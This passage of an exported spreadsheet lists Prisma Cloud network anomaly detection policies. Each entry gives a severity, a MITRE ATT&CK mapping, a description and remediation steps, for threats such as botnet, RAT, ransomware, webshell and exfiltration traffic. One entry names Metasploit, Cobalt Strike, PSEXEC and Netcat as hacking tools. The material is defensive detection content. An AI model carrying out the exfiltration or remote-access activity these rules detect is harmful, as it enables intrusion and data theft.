        </is>
      </c>
      <c r="P1486" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1486" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1486" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1486" t="inlineStr">
        <is>
          <t>Initial Access,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1486" t="b">
        <v>0</v>
      </c>
      <c r="U1486" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1486" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1486" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (worm), is connecting to one of your cloud hosts.
        A computer worm is a standalone malware family that replicates itself in order to spread to other computers. It often uses a computer network to spread itself, relying on security failures to propagate across networks.</t>
        </is>
      </c>
      <c r="X1486"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86" t="inlineStr"/>
      <c r="Z1486" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1486" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1486" t="inlineStr">
        <is>
          <t>2023-03-17 04:14:05</t>
        </is>
      </c>
      <c r="AC1486" t="inlineStr"/>
      <c r="AD1486" t="b">
        <v>1</v>
      </c>
      <c r="AE1486" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1486" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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6" t="inlineStr">
        <is>
          <t>83202628-0b0a-4390-92e3-59a658dfd80a</t>
        </is>
      </c>
      <c r="AI1486" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1486" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1486" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1487">
      <c r="A1487"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87" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1487" s="2" t="inlineStr"/>
      <c r="D1487" t="inlineStr"/>
      <c r="E1487" t="inlineStr"/>
      <c r="F1487" t="inlineStr"/>
      <c r="G1487" t="b">
        <v>1</v>
      </c>
      <c r="H14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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1487" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1487" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with Botnet activity</t>
        </is>
      </c>
      <c r="L1487" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1487" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1487" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1487" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1487" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1487" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1487" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1487" t="inlineStr">
        <is>
          <t>Exfiltration,Execution,Attack Path Rule,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1487" t="b">
        <v>0</v>
      </c>
      <c r="U1487" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1487" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1487" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (botnet).
        A botnet is a number of Internet-connected devices, each of which is running one or more bots. Botnets can be used to perform distributed denial-of-service (DDoS) attacks, steal data, send spam, and allows the attacker to access the device and its connection.</t>
        </is>
      </c>
      <c r="X1487"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87" t="inlineStr"/>
      <c r="Z1487" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1487" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1487" t="inlineStr">
        <is>
          <t>2023-07-20 17:30:37</t>
        </is>
      </c>
      <c r="AC1487" t="inlineStr"/>
      <c r="AD1487" t="b">
        <v>1</v>
      </c>
      <c r="AE1487" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1487" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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7" t="inlineStr">
        <is>
          <t>f7b45314-c007-49c5-acad-92d2269fa5ea</t>
        </is>
      </c>
      <c r="AI1487" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1487" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1487" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1488">
      <c r="A1488" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v12, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v10.0 [Deprecated]</t>
        </is>
      </c>
      <c r="B1488" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1488" s="2" t="inlineStr"/>
      <c r="D1488" t="inlineStr"/>
      <c r="E1488" t="inlineStr"/>
      <c r="F1488" t="inlineStr"/>
      <c r="G1488" t="b">
        <v>1</v>
      </c>
      <c r="H14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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1488" t="inlineStr">
        <is>
          <t>https_data_exfil_network_anomaly</t>
        </is>
      </c>
      <c r="K1488" t="inlineStr">
        <is>
          <t>Unusual high volume data transfer activity from a monitored cloud account</t>
        </is>
      </c>
      <c r="L1488" t="inlineStr">
        <is>
          <t>DATA_EXFILTRATION</t>
        </is>
      </c>
      <c r="M1488" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1488" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1488" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1488" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1488" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1488" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1488" t="inlineStr">
        <is>
          <t>Attack Path Rule,Exfiltration</t>
        </is>
      </c>
      <c r="T1488" t="b">
        <v>0</v>
      </c>
      <c r="U1488" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1488" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1488" t="inlineStr">
        <is>
          <t>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may include using an existing, legitimate external Web (HTTP/S) service. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.</t>
        </is>
      </c>
      <c r="X1488" t="inlineStr">
        <is>
          <t>1. Investigate your source host to determine if data transfer activity represents unauthorized behavior and the outbound traffic should be blocked.
2. Review the communication between your source host and the external host to determine if it conforms with your network policies.
3. Review your logs to determine the first time data was transferred between the hosts in the alert, as this will also help determine the scope of the incident.</t>
        </is>
      </c>
      <c r="Y1488" t="inlineStr"/>
      <c r="Z1488" t="inlineStr">
        <is>
          <t>https_data_exfil_network_anomaly</t>
        </is>
      </c>
      <c r="AA1488" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1488" t="inlineStr">
        <is>
          <t>2023-06-23 07:08:01</t>
        </is>
      </c>
      <c r="AC1488" t="inlineStr"/>
      <c r="AD1488" t="b">
        <v>1</v>
      </c>
      <c r="AE1488" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1488" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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8" t="inlineStr">
        <is>
          <t>ebdeb473-7798-46a3-91ec-01123a134655</t>
        </is>
      </c>
      <c r="AI1488" t="inlineStr">
        <is>
          <t>https_data_exfil_network_anomaly</t>
        </is>
      </c>
      <c r="AJ1488" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1488" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1489">
      <c r="A1489"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89" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1489" s="2" t="inlineStr"/>
      <c r="D1489" t="inlineStr"/>
      <c r="E1489" t="inlineStr"/>
      <c r="F1489" t="inlineStr"/>
      <c r="G1489" t="b">
        <v>0</v>
      </c>
      <c r="H14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89" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1489" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1489" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with Remote Access Trojan activity</t>
        </is>
      </c>
      <c r="L1489" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1489" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1489" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1489" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1489" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1489" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1489" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1489" t="inlineStr">
        <is>
          <t>Exfiltration,Execution,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1489" t="b">
        <v>0</v>
      </c>
      <c r="U1489" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1489" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1489" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (remote access trojan).
        Remote Access Trojans (RAT) are programs that provide the capability to allow covert surveillance or the ability to gain unauthorized access to a victim machine. Often packaged to imitate legitimate applications, RATs can mimic the behavior of keylogger applications by allowing the automated collection of data, such as keystrokes, usernames, passwords, screenshots, browser history, emails, and chat logs.</t>
        </is>
      </c>
      <c r="X1489"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89" t="inlineStr"/>
      <c r="Z1489" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1489" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB1489" t="inlineStr">
        <is>
          <t>2024-11-13 23:45:37</t>
        </is>
      </c>
      <c r="AC1489" t="inlineStr"/>
      <c r="AD1489" t="b">
        <v>1</v>
      </c>
      <c r="AE1489" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1489" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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89" t="inlineStr">
        <is>
          <t>ad51ce53-c0bc-460e-a535-1c1d0344abec</t>
        </is>
      </c>
      <c r="AI1489" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1489" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1489" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1490">
      <c r="A1490"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90" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1490" s="2" t="inlineStr"/>
      <c r="D1490" t="inlineStr"/>
      <c r="E1490" t="inlineStr"/>
      <c r="F1490" t="inlineStr"/>
      <c r="G1490" t="b">
        <v>1</v>
      </c>
      <c r="H14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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1490" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1490" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with Hacking Tool activity</t>
        </is>
      </c>
      <c r="L1490" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1490" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1490" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1490" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1490" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1490" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1490" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1490" t="inlineStr">
        <is>
          <t>Attack Path Rule,AutoFocus Threat,Initial Access</t>
        </is>
      </c>
      <c r="T1490" t="b">
        <v>0</v>
      </c>
      <c r="U1490" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1490" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1490" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (hacking tool), is connecting to one of your cloud hosts.
        Hacking tools are commonly leveraged by attackers to infect, maintain, administer victim machines, and/or perform denial of service attacks. Some examples of hacking tools are Metasploit and Cobalt Strike. Hacking tools can also include administration tools that can be benign or malicious, like Microsoft’s PSEXEC or Netcat.</t>
        </is>
      </c>
      <c r="X1490"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90" t="inlineStr"/>
      <c r="Z1490" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1490" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1490" t="inlineStr">
        <is>
          <t>2023-08-04 06:09:47</t>
        </is>
      </c>
      <c r="AC1490" t="inlineStr"/>
      <c r="AD1490" t="b">
        <v>1</v>
      </c>
      <c r="AE1490" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1490" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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0" t="inlineStr">
        <is>
          <t>598b0ab1-de5b-48de-8a6f-94a840d1c2dc</t>
        </is>
      </c>
      <c r="AI1490" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1490" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1490" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1491">
      <c r="A1491" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v6.3 [Deprecated], Matt's ATT&amp;ACK, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B1491" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1491" s="2" t="inlineStr"/>
      <c r="D1491" t="inlineStr"/>
      <c r="E1491" t="inlineStr"/>
      <c r="F1491" t="inlineStr"/>
      <c r="G1491" t="b">
        <v>1</v>
      </c>
      <c r="H14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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1491" t="inlineStr">
        <is>
          <t>portsweep_network_anomaly</t>
        </is>
      </c>
      <c r="K1491" t="inlineStr">
        <is>
          <t>Port Sweep attempt from outside monitored cloud accounts</t>
        </is>
      </c>
      <c r="L1491" t="inlineStr">
        <is>
          <t>RECONNAISSANCE</t>
        </is>
      </c>
      <c r="M1491" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1491" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1491" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1491" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1491" t="inlineStr">
        <is>
          <t>TA0007</t>
        </is>
      </c>
      <c r="R1491" t="inlineStr">
        <is>
          <t>T1046 - Network Service Discovery (TA0007)</t>
        </is>
      </c>
      <c r="S1491" t="inlineStr">
        <is>
          <t>Discovery,Reconnaissance</t>
        </is>
      </c>
      <c r="T1491" t="b">
        <v>0</v>
      </c>
      <c r="U1491" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1491" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1491" t="inlineStr">
        <is>
          <t>Identifies port sweep attempts by inspecting the rejected inbound traffic to your cloud environment. A host outside your environment is sweeping several of your cloud hosts. Port sweeps are a type of discovery attack where a source host is probing multiple target hosts on a single port, to identify the service associated with the port.</t>
        </is>
      </c>
      <c r="X1491" t="inlineStr">
        <is>
          <t>1. Review the list of target hosts to determine those where the port can be closed. Reducing the number of ports available decreases the opportunities for adversaries to compromise your cloud resources.
        2. Please review and fix any violating policy associated with the target hosts in the alert, as reported by Prisma Cloud.</t>
        </is>
      </c>
      <c r="Y1491" t="inlineStr"/>
      <c r="Z1491" t="inlineStr">
        <is>
          <t>portsweep_network_anomaly</t>
        </is>
      </c>
      <c r="AA1491" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1491" t="inlineStr">
        <is>
          <t>2023-03-17 04:14:05</t>
        </is>
      </c>
      <c r="AC1491" t="inlineStr"/>
      <c r="AD1491" t="b">
        <v>1</v>
      </c>
      <c r="AE1491" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1491" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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1" t="inlineStr">
        <is>
          <t>61978731-e5ab-2371-86e0-7a22cd9bb8a7</t>
        </is>
      </c>
      <c r="AI1491" t="inlineStr">
        <is>
          <t>portsweep_network_anomaly</t>
        </is>
      </c>
      <c r="AJ1491" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1491" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1492">
      <c r="A1492"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92" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1492" s="2" t="inlineStr"/>
      <c r="D1492" t="inlineStr"/>
      <c r="E1492" t="inlineStr"/>
      <c r="F1492" t="inlineStr"/>
      <c r="G1492" t="b">
        <v>1</v>
      </c>
      <c r="H14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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1492" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1492" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with File Infector activity</t>
        </is>
      </c>
      <c r="L1492" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1492" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1492" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1492" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1492" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1492" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1492" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1492" t="inlineStr">
        <is>
          <t>Exfiltration,Execution,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1492" t="b">
        <v>0</v>
      </c>
      <c r="U1492" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1492" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1492" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (file infector).
        File infector malware propagates malicious files on to other systems, removable devices, and networks. To do this routine, they seek out and copy their malicious code to certain files (such as .EXE, .DLL, .SYS, and .HTML).</t>
        </is>
      </c>
      <c r="X1492"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92" t="inlineStr"/>
      <c r="Z1492" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1492" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1492" t="inlineStr">
        <is>
          <t>2023-07-20 17:32:18</t>
        </is>
      </c>
      <c r="AC1492" t="inlineStr"/>
      <c r="AD1492" t="b">
        <v>1</v>
      </c>
      <c r="AE1492" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1492" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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2" t="inlineStr">
        <is>
          <t>1fd2c019-6af7-4382-8a40-6d2d06abb0e5</t>
        </is>
      </c>
      <c r="AI1492" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1492" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1492" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1493">
      <c r="A1493"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93" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1493" s="2" t="inlineStr"/>
      <c r="D1493" t="inlineStr"/>
      <c r="E1493" t="inlineStr"/>
      <c r="F1493" t="inlineStr"/>
      <c r="G1493" t="b">
        <v>1</v>
      </c>
      <c r="H14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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1493" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1493" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with File Infector activity</t>
        </is>
      </c>
      <c r="L1493" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1493" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1493" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1493" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1493" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1493" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1493" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1493" t="inlineStr">
        <is>
          <t>Initial Access,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1493" t="b">
        <v>0</v>
      </c>
      <c r="U1493" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1493" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1493" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (file infector), is connecting to one of your cloud hosts.
        File infector malware propagates malicious files on to other systems, removable devices, and networks. To do this routine, they seek out and copy their malicious code to certain files (such as .EXE, .DLL, .SYS, and .HTML).</t>
        </is>
      </c>
      <c r="X1493"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93" t="inlineStr"/>
      <c r="Z1493" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1493" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1493" t="inlineStr">
        <is>
          <t>2023-03-17 04:14:05</t>
        </is>
      </c>
      <c r="AC1493" t="inlineStr"/>
      <c r="AD1493" t="b">
        <v>1</v>
      </c>
      <c r="AE1493" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1493" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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3" t="inlineStr">
        <is>
          <t>522cc1da-7e5a-43e2-99a3-a853db94fd9b</t>
        </is>
      </c>
      <c r="AI1493" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1493" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1493" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1494">
      <c r="A1494"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94" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1494" s="2" t="inlineStr"/>
      <c r="D1494" t="inlineStr"/>
      <c r="E1494" t="inlineStr"/>
      <c r="F1494" t="inlineStr"/>
      <c r="G1494" t="b">
        <v>1</v>
      </c>
      <c r="H14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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1494" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1494" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with Ransomware activity</t>
        </is>
      </c>
      <c r="L1494" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1494" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1494" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1494" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1494" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1494" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1494" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1494" t="inlineStr">
        <is>
          <t>Attack Path Rule,AutoFocus Threat,Initial Access</t>
        </is>
      </c>
      <c r="T1494" t="b">
        <v>0</v>
      </c>
      <c r="U1494" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1494" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1494" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (ransomware), is connecting to one of your cloud hosts.
        Ransomware is a type of malware that prevents users from accessing their system or personal files and demands ransom payment in order to regain access.</t>
        </is>
      </c>
      <c r="X1494"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94" t="inlineStr"/>
      <c r="Z1494" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1494" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1494" t="inlineStr">
        <is>
          <t>2023-06-23 07:08:01</t>
        </is>
      </c>
      <c r="AC1494" t="inlineStr"/>
      <c r="AD1494" t="b">
        <v>1</v>
      </c>
      <c r="AE1494" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1494" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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4" t="inlineStr">
        <is>
          <t>c53ea37e-367d-4200-aad1-16f3b678005b</t>
        </is>
      </c>
      <c r="AI1494" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1494" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1494" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1495">
      <c r="A1495"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95" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1495" s="2" t="inlineStr"/>
      <c r="D1495" t="inlineStr"/>
      <c r="E1495" t="inlineStr"/>
      <c r="F1495" t="inlineStr"/>
      <c r="G1495" t="b">
        <v>1</v>
      </c>
      <c r="H14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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1495" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1495" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with Webshell activity</t>
        </is>
      </c>
      <c r="L1495" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1495" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1495" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1495" t="inlineStr">
        <is>
